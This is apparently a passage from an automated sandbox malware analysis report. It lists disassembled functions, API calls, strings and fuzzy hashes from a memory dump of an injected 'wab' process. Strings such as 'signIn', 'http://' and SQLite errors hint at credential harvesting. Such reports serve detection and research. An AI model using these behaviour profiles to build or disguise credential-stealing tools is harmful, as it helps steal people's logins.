                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                    • String ID:
                    • API String ID: 2163313125-0
                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                    Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$wcslen
                    • String ID:
                    • API String ID: 239872665-3916222277
                    • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                    • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                    Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpywcslen$_snwprintfmemset
                    • String ID: %s (%s)$YV@
                    • API String ID: 3979103747-598926743
                    • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                    • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                    Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                    • wcslen.MSVCRT ref: 0040A6B1
                    • wcscpy.MSVCRT ref: 0040A6C1
                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                    • wcscpy.MSVCRT ref: 0040A6DB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                    • String ID: Unknown Error$netmsg.dll
                    • API String ID: 2767993716-572158859
                    • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                    • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                    Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • wcscpy.MSVCRT ref: 0040DAFB
                    • wcscpy.MSVCRT ref: 0040DB0B
                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfilewcscpy$AttributesFileString
                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                    • API String ID: 3176057301-2039793938
                    • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                    • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                    Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • unable to open database: %s, xrefs: 0042F84E
                    • too many attached databases - max %d, xrefs: 0042F64D
                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                    • database is already attached, xrefs: 0042F721
                    • database %s is already in use, xrefs: 0042F6C5
                    • cannot ATTACH database within transaction, xrefs: 0042F663
                    • out of memory, xrefs: 0042F865
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                    • API String ID: 1297977491-2001300268
                    • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                    • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                    Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                    • memcpy.MSVCRT ref: 0040EB80
                    • memcpy.MSVCRT ref: 0040EB94
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                    • String ID: ($d
                    • API String ID: 1140211610-1915259565
                    • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                    • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                    Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                    Download Yara Rule
                    APIs
                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                    • Sleep.KERNEL32(00000001), ref: 004178E9
                    • GetLastError.KERNEL32 ref: 004178FB
                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$ErrorLastLockSleepUnlock
                    • String ID:
                    • API String ID: 3015003838-0
                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                    Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00407E44
                    • memset.MSVCRT ref: 00407E5B
                    • _mbscpy.MSVCRT ref: 00407E7E
                    • _mbscpy.MSVCRT ref: 00407ED7
                    • _mbscpy.MSVCRT ref: 00407EEE
                    • _mbscpy.MSVCRT ref: 00407F01
                    • wcscpy.MSVCRT ref: 00407F10
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                    • String ID:
                    • API String ID: 59245283-0
                    • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                    • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                    Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                    • GetLastError.KERNEL32 ref: 0041855C
                    • Sleep.KERNEL32(00000064), ref: 00418571
                    • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                    • GetLastError.KERNEL32 ref: 0041858E
                    • Sleep.KERNEL32(00000064), ref: 004185A3
                    • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$AttributesDeleteErrorLastSleep$??3@
                    • String ID:
                    • API String ID: 3467550082-0
                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                    Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                    • API String ID: 3510742995-3273207271
                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                    Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                    Download Yara Rule
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                    • memset.MSVCRT ref: 00413ADC
                    • memset.MSVCRT ref: 00413AEC
                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                    • memset.MSVCRT ref: 00413BD7
                    • wcscpy.MSVCRT ref: 00413BF8
                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                    • String ID: 3A
                    • API String ID: 3300951397-293699754
                    • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                    • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                    Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                    • wcslen.MSVCRT ref: 0040D1D3
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                    • String ID: strings
                    • API String ID: 3166385802-3030018805
                    • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                    • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                    Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00411AF6
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                    • wcsrchr.MSVCRT ref: 00411B14
                    • wcscat.MSVCRT ref: 00411B2E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileModuleNamememsetwcscatwcsrchr
                    • String ID: AE$.cfg$General$EA
                    • API String ID: 776488737-1622828088
                    • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                    • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                    Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040D8BD
                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                    • memset.MSVCRT ref: 0040D906
                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                    • _wcsicmp.MSVCRT ref: 0040D92F
                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                    • String ID: sysdatetimepick32
                    • API String ID: 1028950076-4169760276
                    • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                    • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                    Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: -journal$-wal
                    • API String ID: 438689982-2894717839
                    • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                    • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                    Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                    • EndDialog.USER32(?,00000002), ref: 00405C83
                    • EndDialog.USER32(?,00000001), ref: 00405C98
                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Item$Dialog$MessageSend
                    • String ID:
                    • API String ID: 3975816621-0
                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                    Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                    Download Yara Rule
                    APIs
                    • _wcsicmp.MSVCRT ref: 00444D09
                    • _wcsicmp.MSVCRT ref: 00444D1E
                    • _wcsicmp.MSVCRT ref: 00444D33
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp$wcslen$_memicmp
                    • String ID: .save$http://$https://$log profile$signIn
                    • API String ID: 1214746602-2708368587
                    • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                    • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                    Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                    • String ID:
                    • API String ID: 2313361498-0
                    • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                    • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                    Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetClientRect.USER32(?,?), ref: 00405F65
                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                    • GetWindow.USER32(00000000), ref: 00405F80
                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$ItemMessageRectSend$Client
                    • String ID:
                    • API String ID: 2047574939-0
                    • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                    • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                    Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                    • String ID:
                    • API String ID: 4218492932-0
                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                    Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                      • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                      • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                    • memcpy.MSVCRT ref: 0044A8BF
                    • memcpy.MSVCRT ref: 0044A90C
                    • memcpy.MSVCRT ref: 0044A988
                      • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                      • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                    • memcpy.MSVCRT ref: 0044A9D8
                    • memcpy.MSVCRT ref: 0044AA19
                    • memcpy.MSVCRT ref: 0044AA4A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: gj
                    • API String ID: 438689982-4203073231
